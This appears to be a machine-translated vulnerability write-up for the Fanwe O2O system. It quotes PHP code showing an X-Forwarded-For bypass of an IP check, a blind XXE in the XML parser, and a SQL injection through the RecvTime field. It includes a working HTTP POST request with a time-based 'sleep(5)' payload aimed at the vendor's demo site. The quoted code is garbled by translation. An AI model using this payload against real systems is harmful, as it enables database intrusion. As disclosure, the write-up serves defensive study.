Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection

Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection

Fanwe O2O, demo site address: http://o2odemo.fanwe.net//cpapi/qxtapi.php

define("FILE_PATH","/cpapi");require_once '../system/system_init.php';$ip = CLIENT_IP;$xml = file_get_contents('php://input');if($ip!='221.179.180.156' || $xml==""){ header("Content-Type:text/html; charset=utf-8"); echo "·Ç·¨·ÃÎÊ"; exit;}$xml = str_replace(array("/r/n", "/r", "/n"), "", $xml);$xml_arr = simplexml_load_string($xml);

The above code. IP address verification can be bypassed using XFF, and simplexml_load_string is directly called to parse the POST string, resulting in XXE entity injection. Because there is no output later, here is a "Blind note", Blind XXE. I tested the official demo, but the data packet was not sent out. There may be many reasons (whether to support the Internet or whether to restrict XML entities at the underlying layer). I succeeded locally. Here we read the web logs that the file passes to me through base64:

This is not the focus. Continue to look at the code below. SQL injection is the focus:

$ Xml_arr = simplexml_load_string ($ xml); $ SrcMobile = $ xml_arr-> Body-> Message-> SrcMobile; $ Content = $ xml_arr-> Body-> Message-> Content; $ RecvTime = $ xml_arr-> Body-> Message-> RecvTime; $ arr = explode ("-", $ Content); $ prefix = $ arr [0]; if ($ prefix! = 'U' & $ prefix! = 'V') {if (log_coupon ("", "SMS content :". $ Content, $ RecvTime) & $ SrcMobile) {$ msg_data ['dest'] = $ SrcMobile; $ msg_data ['send _ type'] = 0; $ msg_data ['content'] = "SMS format error"; $ msg_data ['send _ time'] = 0; $ msg_data ['is _ send'] = 0; $ msg_data ['create _ time'] = NOW_TIME; $ msg_data ['user _ id'] = 0; $ msg_data ['is _ html'] = 0; $ GLOBALS ['db']-> autoExecute (DB_PREFIX. "deal_msg_list", $ msg_data); // insert echo "OK"; exit ;}}

We can see that the content read from xml is passed into the log_coupon function. Follow up and see:

Function log_coupon ($ coupon_sn, $ msg, $ query_id = '') {$ data = array (); $ data ['coupon _ sn '] = $ coupon_sn; $ data ['msg '] = $ msg; $ data ['query _ id'] = $ query_id; $ data ['create _ time'] = NOW_TIME; if ($ GLOBALS ['db']-> getOne ("select count (*) from ". DB_PREFIX. "coupon_log where query_id = '". $ query_id. "'") = 0) {$ GLOBALS ['db']-> autoExecute (DB_PREFIX. "coupon_log", $ data); // insert return true;} else {return false ;}}

It can be seen that query_id (that is, the RecvTime in XML) is directly introduced into the SQL statement. This demo station can demonstrate the latency injection. POST the following data packets:

POST /cpapi/qxtapi.php HTTP/1.1Host: o2odemo.fanwe.netAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 147X-FORWARDED-FOR: 221.179.180.156133222211111231230'|sleep(5)#

The result is displayed after a delay of 5 seconds. Write a script to run the database username. See test code.

Solution:

Filter